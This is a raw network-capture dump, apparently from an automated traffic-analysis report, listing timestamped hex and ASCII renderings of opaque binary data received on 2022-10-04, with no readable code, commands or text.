                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7591INData Raw: f8 80 77 2a dc 25 d2 7e 8a 69 67 b1 d8 1c de 4b ba 9d f2 fb e7 d7 7b 6f a7 df fa f0 d1 e3 3c b6 fb 56 4c fa a6 d6 8a 94 9d ae db 4c 44 1d a1 c4 54 66 de d6 5c 16 9c 77 23 a7 e9 02 9e c2 7f 36 ea 30 8c 3c 84 59 fe 0a b8 10 72 c8 aa 13 d0 6c 50 b8 f0 b5 d3 58 54 cc 61 75 93 e3 f6 a2 0b 3a 5f 5d 77 e4 92 52 5c c7 5e 96 ec 25 e3 b9 f9 1a 89 32 85 01 4e 37 97 08 90 4c 9a 73 15 94 7d f4 5e ef 97 aa 53 ea 2b 05 13 e2 20 e0 43 c0 1b bd 96 d6 52 ba b3 60 f0 a5 9a cc 12 03 83 95 93 98 8a 6a 58 25 0f f6 19 bc 6b 72 02 00 72 45 0a 21 67 1b 4d 33 cd 70 f1 eb 26 16 49 e0 12 fe dc 01 d8 ce d6 d3 32 87 2b cd a5 b2 38 35 92 4d 90 9a 2c ec d6 60 96 b1 d3 d2 c4 37 4a 29 b3 b3 7b d3 ad 6b 44 b4 4c e8 1c d6 a4 9e 30 f7 18 74 19 87 7a f2 5d b7 6f 97 09 e1 ee 28 5c 42 7b ce a9
                                                                                                                                                                                                                                    Data Ascii: w*%~igK{o<VLLDTf\w#60<YrlPXTau:_]wR\^%2N7Ls}^S+ CR`jX%krrE!gM3p&I2+85M,`7J){kDL0tz]o(\B{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7607INData Raw: 88 59 73 ec 7e 93 82 6e 2c ff da ab f6 ea 2e a2 5e a2 c5 15 38 dc 94 6c 24 9d 45 80 5b e3 0d 57 9f db ca 86 bb 98 86 01 fa 74 24 13 3c ea 67 1d d0 04 6a 2e be 84 de a3 24 1d 07 2f 13 e0 1c 0a de 44 49 b4 72 80 2f 9e e7 5f 87 26 0f 5d 02 64 bd ab de 68 c6 f2 ed 7b 3f 1a 6b d7 4a 1a 81 3e d8 74 ef 16 63 f1 1f 3e 81 dd 4c 77 6b 33 7c c6 69 03 60 23 d7 dd 58 f2 79 65 89 af cf 66 61 9d 17 3f 90 c3 a7 3a b4 fb c2 3a 84 ec e0 33 f2 3b c1 63 21 f3 a5 50 16 d8 b8 a6 ce 29 6e 4a 7b 31 58 f8 aa ec 66 19 89 0c f9 42 e4 e3 2c 3d 3c 8e c4 be 6f 15 a8 3c c3 1e 2c d6 55 f4 ea 14 cd 78 75 8f 5e bd 63 6b ed fe b1 31 f9 67 4f be 63 99 49 86 fd 7d 7f 71 b4 94 82 db b5 25 fe 46 1b df cb 8f 4d 5a 9f c0 44 4d b7 31 e9 29 03 cc fb ed 52 9a 2e 2e 72 51 d4 36 bd 0d ee 32 a1 93 41
                                                                                                                                                                                                                                    Data Ascii: Ys~n,.^8l$E[Wt$<gj.$/DIr/_&]dh{?kJ>tc>Lwk3|i`#Xyefa?::3;c!P)nJ{1XfB,=<o<,Uxu^ck1gOcI}q%FMZDM1)R..rQ62A
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7623INData Raw: 43 ab a3 12 99 06 51 30 30 1d 5d 92 4a 07 f6 44 0a 3b 2d 0e ee f5 12 d7 59 c7 c5 59 84 69 bd 8a 2c 72 df d7 3c c2 14 23 b7 c1 dc d6 ae 13 30 68 79 df cf 7d b0 e2 3a b3 81 5f 0c 54 1d 1a f6 c9 ee a1 77 92 b9 1e b9 36 5f 2f 58 97 4c 76 43 4e cd f3 22 1d 9b cb 21 5e c3 bf 24 00 3a ca 4f 5d c0 72 0e d1 1b 05 75 27 4c b3 9e bb 66 2d 57 48 b4 52 46 da ae 59 9c 97 c9 67 5d 48 df 63 13 4c 0a 34 99 e1 4c 25 13 76 61 f7 b9 57 94 7d 60 2a e6 8f e8 4f 81 f1 d9 d0 56 8c c2 44 4a 02 16 33 be 35 fc 27 2c c3 1b 8b 21 53 36 ee 2f 69 59 ea b1 a9 bb 19 8c 28 8a 4d f3 0b dd 6b 8e fc f9 6f 0a c9 da 8e 8a 4d 53 33 40 ab 2d 2f 32 3d 80 b8 7d ec 1d 93 0b 5f 1a 43 1b 19 34 5e 97 b0 ab 54 c9 51 38 6d 94 bc db d2 22 5b cc 2a 90 b1 0c 89 35 86 d2 3f f7 5e 7c 9d 56 5e f9 52 fb 16 d9
                                                                                                                                                                                                                                    Data Ascii: CQ00]JD;-YYi,r<#0hy}:_Tw6_/XLvCN"!^$:O]ru'Lf-WHRFYg]HcL4L%vaW}`*OVDJ35',!S6/iY(MkoMS3@-/2=}_C4^TQ8m"[*5?^|V^R
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7639INData Raw: cf d8 a2 fc d1 d6 66 34 64 98 d3 b6 a5 3d 0e 7c 22 bf 02 b3 2d 16 fe f1 77 e4 bf c2 f5 a0 dd a4 61 19 28 d1 1e 41 62 a5 c2 1f bd a4 d6 69 e6 6d df 79 ab f5 b2 00 17 22 9a 77 20 43 99 8b 63 07 62 11 45 d8 79 aa 0a 25 f7 6d 9b 2b 65 84 29 33 17 f0 67 90 05 22 8d e5 42 92 28 f7 b9 ca 13 87 f6 69 fb ba 69 00 07 69 98 b7 50 ad 38 ca e2 16 52 69 78 f9 3a 89 e4 ec ce 05 cb cd 15 b4 f4 f9 1f 52 76 69 50 17 cb b9 46 2f a0 94 05 df 09 d9 19 e2 15 ef c2 db d7 14 92 61 9e c2 f4 ce 48 45 c8 a2 da cf 24 46 8f 44 87 1f 2a ab 53 8a 77 01 f8 fb af df e3 90 6e c7 81 c0 0b 1d 79 d6 0f 2d 5b 12 da 71 1c dc fd 7c 3f c2 5b a5 e0 8b b1 98 45 ab b0 d9 c5 14 38 4b 25 a0 01 f9 fe 40 27 fd 05 d0 cb 64 29 d5 e8 26 b7 23 26 37 e2 65 aa b6 9c 8f 6f d3 ee 86 07 9b ea d7 f8 55 eb 0f ab
                                                                                                                                                                                                                                    Data Ascii: f4d=|"-wa(Abimy"w CcbEy%m+e)3g"B(iiiP8Rix:RviPF/aHE$FD*Swny-[q|?[E8K%@'d)&#&7eoU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7655INData Raw: 80 7b a8 45 25 12 03 bc 87 0f 8a 53 91 cf 7d a5 20 16 4a e9 4e 68 c6 72 d6 f1 7f e1 30 ab 5f ed e2 07 2d ff 5f b7 78 56 ec 7b 73 0b 27 44 5a fa 1d 3f 07 94 58 4d c5 6e 0d 81 47 44 ef d5 e6 db 31 84 df 25 63 95 51 f2 7a db ca 18 a9 30 1d 36 71 d9 01 da 85 74 02 2a cc a8 c7 df 29 fa eb 78 da 58 22 b3 b5 75 b5 b2 25 2e 84 d6 3c 63 94 a6 83 95 0a 20 c3 3a 8f 35 c9 43 e5 d3 16 bd a9 ac e6 c8 75 1d 28 8e 4c a3 55 58 48 c7 89 22 ac e2 81 2d 23 85 b1 35 4d a6 d2 fe 76 4f 2b 8e aa 17 04 47 7b 0e c9 37 21 48 48 76 19 23 c6 c7 3c 73 34 d9 1b fc 2c f4 af b3 8c f0 80 ad e5 d0 85 b0 39 08 6f 38 a7 35 bf d2 a4 ba 5b 79 ae 5f 99 d3 fb c7 a2 00 71 4b d4 bf 96 16 65 96 b1 e9 b8 de e9 83 a7 be 93 5a 1b 2c 25 83 09 ef a4 17 b4 50 ff 77 28 8b df 8c 87 69 0f ec 75 56 4b d3 6f
                                                                                                                                                                                                                                    Data Ascii: {E%S} JNhr0_-_xV{s'DZ?XMnGD1%cQz06qt*)xX"u%.<c :5Cu(LUXH"-#5MvO+G{7!HHv#<s4,9o85[y_qKeZ,%Pw(iuVKo
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7671INData Raw: e7 36 08 ba 26 c5 3a 63 39 4b f2 26 0a 4d 2a 71 3d 46 1b f7 83 f1 68 22 65 85 a6 b2 1b 59 6c 8f a4 15 a1 f8 bb db 91 92 06 e1 55 f0 00 70 28 c7 fd 42 18 0c 38 c1 49 51 8c 8f 84 d0 b0 a0 81 6e cb 12 c2 60 c4 43 dd 48 26 6f af ae 56 20 af 7b 2a 1d 65 27 cc 1e 26 6c b4 91 2e 81 42 02 a4 1a 6c 0e 74 b1 7e 04 95 5b 0e b9 f0 2f 3b 3f f8 07 84 28 b4 41 9b 46 8a 44 4b 98 17 90 29 f8 c7 e4 58 11 3a 53 72 48 6a eb 01 5b 87 00 bd b1 b8 f0 68 7c ee 44 8c 75 dc 02 55 a0 10 bc 03 a2 92 d2 2c aa 28 35 50 f4 64 57 32 b8 cc 68 78 f0 a4 23 5b 1d ba aa 04 92 f3 72 d8 80 39 11 dd ee e0 1e 3e d2 d4 04 08 f3 11 f5 af a2 d1 1e f8 81 d0 84 86 84 39 29 ba ab 6d af b6 6c d9 59 6d 11 a8 e8 f1 0c 08 cb 29 99 7d dd 38 0c e1 f4 42 39 de 2f e2 aa ca 82 95 70 4f 34 6b 2f d3 c0 d7 f1 16
                                                                                                                                                                                                                                    Data Ascii: 6&:c9K&M*q=Fh"eYlUp(B8IQn`CH&oV {*e'&l.Blt~[/;?(AFDK)X:SrHj[h|DuU,(5PdW2hx#[r9>9)mlYm)}8B9/pO4k/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7687INData Raw: 61 71 84 14 12 83 9b db ad 24 43 ca 83 45 17 a3 7b 62 86 4d f0 9e 0c 1b dc cc 35 cc 66 c7 51 d0 5f 87 01 5a 09 fc c3 0b 93 f0 00 5a 0d c2 ea 6a 7d e6 af 0c 66 37 0c bb a2 b1 22 f4 b8 ba 32 ff da 12 43 fc 48 90 c1 13 63 a9 a1 f4 97 8f 83 41 72 b8 32 ba 7e a4 05 80 e0 a4 d7 08 54 65 8e 82 a0 59 be e3 25 79 fc a8 96 7e 5d d5 78 f0 fe dd 05 7b 5f 9f 26 21 e7 8e 30 3f b9 3c 83 17 67 71 72 b6 3d 45 6b da cf a0 a7 95 98 57 99 f1 b4 21 ec bd 68 5d d2 ae fd aa 07 cc 87 43 0b a4 71 12 76 bc 5a 89 5c 6c 81 9a d2 bd 42 f2 db 2e 66 d2 0f be 99 cb 59 37 ba 42 44 77 12 05 68 0e 19 b8 e3 a0 97 ec b5 4a 63 64 82 bd e9 be dc 16 64 10 ff db 94 16 98 7f c7 8c 60 13 26 0f 47 ae f2 70 93 80 ed 5d 37 dc 04 27 d7 e1 f6 05 1c a7 75 c1 d7 21 85 4e c1 54 03 e9 ef 9a 94 9d 14 41 19
                                                                                                                                                                                                                                    Data Ascii: aq$CE{bM5fQ_ZZj}f7"2CHcAr2~TeY%y~]x{_&!0?<gqr=EkW!h]CqvZ\lB.fY7BDwhJcdd`&Gp]7'u!NTA
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7703INData Raw: cf ff ac da b0 c8 f0 b9 b8 eb 41 af ef 9d d5 ac 13 8f 26 57 95 8a 12 86 ae c9 33 a4 ef 47 78 82 83 a2 e8 25 9e 09 e7 fa b6 a0 e4 8e ab a9 23 55 71 54 f2 5b 92 9b 00 ef bd c2 92 71 4c 80 a8 45 e2 85 07 28 a5 56 04 03 5b c1 0c 9b c8 8e 47 0f 54 94 7b 66 64 70 ab 2e 95 23 dd 85 64 0c f1 ef 5f 60 45 09 05 e8 ac ab a0 8e cd 25 0c b0 ee 7f 6f 72 ad 2d e9 64 a8 91 b3 e9 b9 b6 24 5b a1 87 e2 f4 12 e6 2f 62 d5 74 84 f9 df 75 3a 35 2c 35 10 cc 59 09 9a 56 e0 ef 6c b1 52 52 4d 89 0f 31 88 10 99 97 ad 9a 87 50 37 35 8c f3 92 fd 3d e2 55 cb 51 01 f1 4e c8 20 fa e3 b7 74 12 97 fb 3c 3f 0e b8 97 b2 04 f1 b0 d5 9d dd 33 f2 37 95 74 49 05 65 28 92 b2 67 36 b4 3e 08 71 51 6e 1c a1 6c 93 c3 1e c1 62 a0 59 8a 67 8e d6 d6 0c 10 98 63 63 7e 44 95 84 3c 9f 26 b2 a4 ba e7 93 dc
                                                                                                                                                                                                                                    Data Ascii: A&W3Gx%#UqT[qLE(V[GT{fdp.#d_`E%or-d$[/btu:5,5YVlRRM1P75=UQN t<?37tIe(g6>qQnlbYgcc~D<&
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7719INData Raw: 7c da 44 bf ac 33 14 0e 77 52 4c ac 08 fe 56 8d f3 c0 99 72 24 d5 4e 07 69 bd aa 0b 76 06 57 37 1b cf df fc b3 30 9c c2 7e 79 41 e5 45 b3 46 cf d3 d5 17 2d 5b 73 66 22 ea 4c d7 9f 26 92 73 38 d3 b6 ab 4e 27 7b 11 17 0f a7 d6 8b 3b 2f a3 46 80 ea 25 47 a0 6e 52 d0 c9 4a 0d 9f 50 c9 2e 3c 41 61 4f b4 61 07 0f a4 eb 75 68 ce de e2 6f d9 a1 26 9e 0a 5c 8a a1 23 52 d2 67 f8 25 15 78 e2 69 41 bc 26 cc 5f ed ab e2 eb ce 5d 7a bc 45 0d 51 03 c1 09 0b ba f6 36 e7 ff 06 29 ed f2 c6 33 5a 79 f4 e1 f8 4f 27 b5 1c b0 7e e4 66 a3 3b 2c 44 b8 80 c2 fc 56 7d 52 b5 0f fb 3d 9e af 3a 82 e9 a7 24 eb b0 b4 1d 42 f6 f8 98 d5 76 63 97 6a ca cc 3d e3 34 6c 64 c6 41 72 8b 7e d0 2c a8 42 59 e6 7a c7 f8 52 a5 95 55 54 f9 74 5d cd 69 9b 26 eb 35 69 d7 41 09 9d c6 d2 83 07 ec 93 cb
                                                                                                                                                                                                                                    Data Ascii: |D3wRLVr$NivW70~yAEF-[sf"L&s8N'{;/F%GnRJP.<AaOauho&\#Rg%xiA&_]zEQ6)3ZyO'~f;,DV}R=:$Bvcj=4ldAr~,BYzRUTt]i&5iA
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7735INData Raw: bd 8a d0 9a 9b 17 c8 0e 1c 3c 07 38 2a 07 06 a6 b7 6a ab 00 86 ba 33 74 c8 94 7b c5 37 19 83 b0 3a 08 09 c6 3f 53 88 bf 3d cb 17 0c 6d 85 f3 e0 cd 53 f6 8e 42 5b 2d 9d 83 5e 3e 50 4f a0 ba 18 c1 bb 96 3a 03 ba 0e 2d 59 a5 a5 27 71 0d df 40 28 29 b6 09 23 c8 f7 1d c9 fb 3f 59 8f c9 5b f9 dd ed de d1 01 f2 12 14 f9 ce ff 4c eb f0 4c d3 58 9c f5 87 ef da 90 aa d3 e1 54 2d db cc c7 df ce 3a 2e 78 9f f6 bc 06 e5 dd 7a f3 c6 8b a5 77 38 41 c7 dd 7f d0 ef 19 d3 d0 4d aa ab 17 22 fa 46 fd 9e 91 6c 04 a3 98 64 96 e0 8c 38 a9 1b 05 61 20 8f 53 f3 37 de 96 95 d7 06 3b 8c d8 b7 db cc 33 3d 01 c8 6f d0 53 c3 ee 1b 58 a1 eb 60 c4 e5 46 3e 49 76 1d 92 80 f0 c0 4d 90 a7 fc 5a e0 e1 16 ff 37 fc 96 68 ea 13 d1 c1 02 5b 92 01 14 90 fb 72 2d 1b a1 b5 33 60 21 f9 42 ad 79 10
                                                                                                                                                                                                                                    Data Ascii: <8*j3t{7:?S=mSB[-^>PO:-Y'q@()#?Y[LLXT-:.xzw8AM"Fld8a S7;3=oSX`F>IvMZ7h[r-3`!By
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7751INData Raw: 50 c7 79 a9 83 1d 8f b2 fc a6 75 9e 2a b7 af df 6a 7c 3a 53 1c 3f 83 e5 f6 ce 1d 27 81 7a b9 8f bf 7a 63 e8 e3 af 64 49 4f b0 d8 44 4d d6 bc e5 d4 86 5e c7 2e 44 c3 72 fa 16 99 0b 73 0f ac f2 83 b9 5f 35 16 55 7f dc 6c 5b 74 b0 78 1b fc 5b 54 a0 a8 44 95 e5 f9 e5 7e 6c bb a6 7e 5e 0d 16 b6 b7 17 f6 c5 dd fb f2 fc ec 09 c3 b4 fc b6 5a 31 70 56 89 2b 4a 24 ac de 22 78 87 cb 1f 1c 8d 8e 85 d1 51 5d 7a 7a f3 98 bf 8d a4 c1 9f b5 e9 34 f4 87 86 24 92 aa 89 5b e3 b2 d9 7a 47 fd 78 d5 eb b6 d2 ac e3 89 53 f2 1a 29 c5 d0 a3 01 a9 da f1 c9 39 64 1d fc 18 5a f9 7a 43 5d d6 87 05 af 9e 20 12 9c 2e 62 e9 f0 44 ef 0a 07 24 e7 3a a5 4a 5c 5f b0 7a f3 2c f9 94 69 e9 e7 30 c1 82 6b a9 7b 81 7a 6e bc a9 13 ee 2e a3 b7 7c 11 e9 c4 43 63 fa bf f3 de 19 f3 67 76 41 b7 6d c4
                                                                                                                                                                                                                                    Data Ascii: Pyu*j|:S?'zzcdIODM^.Drs_5Ul[tx[TD~l~^Z1pV+J$"xQ]zz4$[zGxS)9dZzC] .bD$:J\_z,i0k{zn.|CcgvAm
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7767INData Raw: 0c f3 15 60 5e 45 aa 6e fa 3e ca 8b 62 ca 6b 6a 0f 14 6c 8b de d4 cc bf e2 03 69 9e 41 4a 43 42 61 9d ef 47 cd 41 19 97 aa f4 eb fc 45 25 f8 24 ad ea aa 49 91 95 fc 1c 74 f1 bd 3e 47 86 70 00 0c a2 1a e3 ff 70 c4 ad 63 73 a1 ce fc 9b b1 ea 4f 6c 0b 88 87 d7 0a bc 7c 03 78 6d fa d4 d5 28 19 e1 94 0a 57 ca 30 55 b0 e9 82 e2 19 f8 2a f3 7d 0d 1b 55 45 5e 1f 23 97 21 85 df b5 41 a1 f0 aa cd bf 59 98 3b d9 32 2d ac 1a cb c9 b7 61 77 71 f1 57 0e 7d cb e7 63 01 b6 df ad af ec 06 b1 9e 32 e0 92 2c 4b 4d 86 82 1e 1f 1f 93 1e 87 30 5b 54 3b 6a 68 4d 7a 96 e8 66 b5 69 0c 5d c1 1e 57 79 ab e6 de 7c 1d 34 e7 f0 0e 8b 86 ff 71 ed 15 52 b2 3a b0 33 54 e4 1b 65 e6 a8 57 08 88 8b 26 9c 9a e5 d4 2a 20 aa 11 c7 3e 1d e8 93 8e 70 60 7d a0 8f f1 4d f3 a5 c8 c7 3f 95 bb b0 e1
                                                                                                                                                                                                                                    Data Ascii: `^En>bkjliAJCBaGAE%$It>GppcsOl|xm(W0U*}UE^#!AY;2-awqW}c2,KM0[T;jhMzfi]Wy|4qR:3TeW&* >p`}M?
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7783INData Raw: 3e e2 cb 65 6e 96 77 10 44 32 17 5b 0b 23 c3 57 b4 8d c9 f7 87 ad b4 b5 db 27 27 c0 bc 8e 08 f2 ef dd fb b1 07 b8 8f ca f0 9a 80 3c ae 47 4c 52 92 97 61 0d cc 94 89 48 47 68 0a 1d d6 6b cd 9a 61 df 3c 22 5f 82 61 61 ec 51 0b dd 2f e1 5c a4 c4 c5 11 6a c6 23 c5 ef 00 e0 e8 d9 bb ec e4 2c 9b 6d 38 0b 8d af 8f 56 90 85 5d 2b db 37 d0 48 45 6a 72 e2 6a c6 fe 06 b4 88 5c 91 bb 77 66 81 02 f5 24 7f 70 8e 70 01 0c f4 a5 cf f0 03 e9 e6 3c c1 44 2b 7e d0 83 ca 7e 66 1c cf ed 4e a7 65 9f b5 34 bf 6f e4 75 e8 a2 b9 b1 7a 69 53 08 62 e0 98 39 1a ca e9 d1 8d 96 6b ea 59 94 6f b8 5b 27 e4 f3 a9 9e 27 d4 53 69 ea 29 34 2a 7b b6 d5 59 3d 1d c8 f1 fb bd 89 1b 61 bd 5f 65 f2 52 85 3a 8c 36 52 d5 b1 a5 86 1b 00 10 19 76 ec cd 57 3f 52 75 79 57 64 6e be b2 01 26 32 eb 24 56
                                                                                                                                                                                                                                    Data Ascii: >enwD2[#W''<GLRaHGhka<"_aaQ/\j#,m8V]+7HEjrj\wf$pp<D+~~fNe4ouziSb9kYo[''Si)4*{Y=a_eR:6RvW?RuyWdn&2$V
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7799INData Raw: ca e2 a3 70 f8 14 c2 f1 4b 79 ff 40 9f f4 ec 46 9d a0 d5 7c fe 91 97 d0 0d 55 c3 d8 c7 5a 31 7c 77 19 c0 de 58 2b b0 ca 3d 8d 42 57 e0 79 f8 34 d5 76 dc 82 86 34 66 a7 fc 9c 15 83 00 31 b5 97 9f 91 25 76 8e 9d 4b 4c 6f d7 03 e7 c7 bd eb d3 5d 8d 99 82 9d b7 f7 a9 6a 8b d7 82 ab a7 20 48 fb 4d ad 01 c6 77 f1 c9 ee 18 e2 54 e9 67 7d 5d 96 30 fe d4 f4 9e 97 c9 3b 4b 36 5f 6e fb ce 26 80 3f 2c eb 39 02 55 57 7b d3 70 aa 04 e5 c1 ed b8 77 bc 4d 10 d0 e5 0a bb 7d 4b 43 c2 6d 5d 7e d5 4f b6 71 a3 3a bc 63 44 06 76 d7 e7 fe 5d 84 12 ef 1a 55 1d 59 68 75 53 c0 c2 41 31 d2 36 2f e4 45 35 47 bd c2 93 1a a3 68 e0 a6 e9 15 d9 3b 06 b1 b3 4c 03 53 77 71 8f be 2d d8 33 78 80 c8 10 c3 71 e0 ed f8 70 f8 f5 42 26 38 6f 96 85 a2 71 53 1d bb cd 33 01 c6 dd dc be a1 f3 18 93
                                                                                                                                                                                                                                    Data Ascii: pKy@F|UZ1|wX+=BWy4v4f1%vKLo]j HMwTg}]0;K6_n&?,9UW{pwM}KCm]~Oq:cDv]UYhuSA16/E5Gh;LSwq-3xqpB&8oqS3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7815INData Raw: cc 62 28 47 e4 a2 ac 88 55 8e 6a b5 71 92 2a 15 d7 2f 55 ff b3 07 50 ad 21 b1 a9 cd 95 e2 80 28 98 19 ab 01 8c a9 fb 7f 6b 4e 96 32 41 2e ef 9d ec c5 69 13 a0 37 83 d1 1d e0 6d 68 a7 3e 7d 28 7b 35 6d 40 1e a9 0e ea ef de f4 1f 4b 26 70 e9 4b c7 7b ba e2 e0 8b ce ba 6d d7 5b 8b ee 7d f4 c3 0d 9e 70 02 6e 2e e9 a4 b1 00 69 02 bb 0c 18 d8 c0 c5 7b ac ea 4a 27 7a 93 75 74 55 77 f6 7e cb 77 d2 80 77 d8 1d 76 bf 6b 0e 7c d3 01 ba af 98 18 73 68 52 59 c3 2d 1f 2f 12 e7 06 db bf 40 9a 69 84 77 5b 17 a2 84 86 a1 0a 91 f8 1d 28 5c 73 74 9f ac 8f 5f b3 f6 a5 49 60 0c 06 f4 14 d1 ac ff fb 05 0e b6 8d 7a 35 24 8b cf d5 56 9b db 29 18 51 25 76 bc 16 93 8d 0c 5b da 0f 45 bf c2 25 1f f6 b6 fd 1f 5a ff 95 12 33 f2 c0 fc ed 41 ca 4e 85 92 7e 22 4f 49 28 34 b3 5e 1f 29 1b
                                                                                                                                                                                                                                    Data Ascii: b(GUjq*/UP!(kN2A.i7mh>}({5m@K&pK{m[}pn.i{J'zutUw~wwvk|shRY-/@iw[(\st_I`z5$V)Q%v[E%Z3AN~"OI(4^)
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7831INData Raw: 9b 05 4f 9a 96 11 84 f3 e2 68 0b 6e 3e 5e 41 09 13 b2 08 de a6 00 4b c9 cf e7 e6 b2 b8 33 e7 a6 d7 cd 1f cd 8e a5 ab cf 0e 1c 86 2f 03 da d4 c1 90 74 99 37 1f d0 47 4b e2 54 08 4a 43 d0 3f c3 00 b3 fc ba b0 11 04 5b 41 8a 52 5c 37 88 90 99 84 f2 2c aa a2 3a d0 d7 c6 db b8 c1 28 3e c8 78 62 45 e6 8c 89 70 b8 aa 58 a5 aa 0c 34 62 39 d4 92 51 ac 47 66 3d 91 28 e9 a0 1e 30 44 58 30 fc 59 df 55 4b 41 a3 73 62 e1 bd 52 2b bb b9 ea 13 2b 90 45 db b9 32 3b 9d b7 97 09 39 3d 80 d7 20 2d b5 53 13 e1 5c ae 32 f7 2e ec ad a5 8d 54 48 6b 69 f3 10 66 0e e5 65 38 25 c9 e2 ec 02 d7 83 e2 ad 3f b9 14 04 c2 2b 23 13 f2 e7 da 2d 8f 4e 10 c8 cd b8 63 87 d2 05 97 05 b9 52 6b fb 41 08 f3 7c 89 2b ff 70 a0 9a 32 29 bf 44 14 94 4c 2d 42 4c a3 a6 d3 3e 85 a4 5f 29 7d 3e 1a 62 05
                                                                                                                                                                                                                                    Data Ascii: Ohn>^AK3/t7GKTJC?[AR\7,:(>xbEpX4b9QGf=(0DX0YUKAsbR++E2;9= -S\2.THkife8%?+#-NcRkA|+p2)DL-BL>_)}>b
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7847INData Raw: fc 70 7a ba 2a 35 85 34 b1 42 e4 bf 0b 59 46 e6 6b da 88 5a cb 06 2a de 9d 0e 03 7b 2d 13 c8 2a ea 3f 4a 94 f4 e7 f0 13 b6 e3 c2 03 6f 14 7f b0 4e c1 19 c8 bd a7 18 b8 1e 84 b3 f2 0c a4 a9 88 30 44 8f 58 b8 81 67 d3 61 cf 42 4d b1 85 56 97 9a 9c 00 7f fc 96 af 78 27 d5 41 48 64 35 14 d3 19 03 4e 9b 74 7c e5 05 bb 3a c8 8d d7 ef e4 b1 27 86 de c9 6b de b8 0a 74 31 e9 f7 62 19 82 a3 3a 64 17 31 ea 65 1a 96 64 6f e4 cc 76 ff 21 14 c8 33 e4 91 9c ce aa 7d 33 61 ed ce 54 d3 23 fe 73 fa c4 be 5e 2f 28 2e d6 38 bb b8 f9 ab 4d 78 22 ee c5 14 d0 57 98 22 78 80 42 69 10 b5 6a f4 de 73 b8 d3 b6 90 51 ae a1 8f 59 48 28 56 d0 f0 e2 d6 a5 b5 c3 ca 1a 81 00 2a 0d c4 05 d3 21 15 0c 84 15 0a ac 06 42 6d 3f de 19 aa e3 89 fb 7f a9 c8 9d f6 d5 49 56 4b 23 40 7c 96 02 a4 e0
                                                                                                                                                                                                                                    Data Ascii: pz*54BYFkZ*{-*?JoN0DXgaBMVx'AHd5Nt|:'kt1b:d1edov!3}3aT#s^/(.8Mx"W"xBijsQYH(V*!Bm?IVK#@|
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7863INData Raw: f9 7d ee 3a b6 21 ae 55 35 e3 fd d9 d1 aa b8 8d fb 88 6c e0 aa 29 e9 fb 3a 0e 55 4c 9a e6 4a 69 22 0d 12 40 3b ee 76 e9 8c 69 42 b4 f3 3c de 08 e3 da 97 52 92 d7 1c 27 df c8 d2 03 da 62 03 4f b7 5f 09 72 3c 23 e3 41 a3 c9 74 35 a3 71 34 b4 57 02 47 b6 6b 18 fa 41 9a a7 08 38 40 67 78 72 4d 25 61 36 6a 61 e9 d8 a3 62 43 06 59 7c 90 36 28 49 ea 56 c9 05 f6 0d 09 d0 8f c6 e6 5e 09 d0 91 bf 07 85 4d 75 5d 51 34 b4 eb 4e 1e a8 3f 72 5a 08 bd 99 48 a2 91 83 78 6c 06 bd d7 de d0 e3 d1 33 f2 46 dd da 06 03 2f 3f 30 25 ba 69 f6 02 01 50 59 e8 81 1e f9 b5 5e 68 84 f5 7d 44 0f c8 2f 6d 93 fa e5 d9 ad ae 76 35 38 32 7b 18 fc 03 ec 58 ba af 45 dd 27 ef 58 67 f5 96 87 2d f1 f6 a8 8a e9 54 6e 8f 2e fb 46 a1 cd 08 09 a8 86 77 2b 94 a1 0d 6a b6 dc ad bb de e0 f8 dd 1d 51
                                                                                                                                                                                                                                    Data Ascii: }:!U5l):ULJi"@;viB<R'bO_r<#At5q4WGkA8@gxrM%a6jabCY|6(IV^Mu]Q4N?rZHxl3F/?0%iPY^h}D/mv582{XE'Xg-Tn.Fw+jQ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7879INData Raw: 95 ea 6e e7 f3 56 c8 b8 d2 18 1d f4 71 32 eb 35 1d 45 d8 78 f9 ed 00 fc 43 ae 19 47 3a 9e 4f 58 05 b7 8f 4c 30 91 f6 90 90 27 69 01 88 59 7d fd c0 5a 20 4d 65 8f 89 bd 7b 39 ab ec 0f 44 04 ac 49 f5 1d 53 c3 23 ea ee 5a ba 1e c0 97 35 b2 e5 ab 7b c2 7c b9 5d 1d 21 9c 78 cb d3 76 9d 58 47 75 a9 3e 30 d1 42 bc 75 e7 1f c5 b5 09 32 c1 cf 22 90 2b b6 bd a3 09 50 ed 38 cb 2d 63 b7 3e 48 8d 47 47 95 1a 61 b6 a8 e7 49 01 09 9f 2a 9b 70 d2 46 0a b1 58 94 db e8 83 22 69 09 d8 da dc a5 3a d8 d1 de ec a7 eb e7 c6 22 55 3a 24 3a 16 34 5d 4f 57 ba 16 5c 0e 13 65 17 b0 e0 4d 4a 98 61 57 a4 7a 37 e1 0a 6c 71 b8 b4 91 51 66 50 6d 60 c7 58 78 74 38 72 80 b4 35 f0 3e 50 c6 ee 65 85 04 a1 83 b5 cb 3d bd 92 32 81 7a d2 2a 2b 40 db bd 42 39 9e 68 70 be 0a d5 9b e6 fe ff e8 4e
                                                                                                                                                                                                                                    Data Ascii: nVq25ExCG:OXL0'iY}Z Me{9DIS#Z5{|]!xvXGu>0Bu2"+P8-c>HGGaI*pFX"i:"U:$:4]OW\eMJaWz7lqQfPm`Xxt8r5>Pe=2z*+@B9hpN
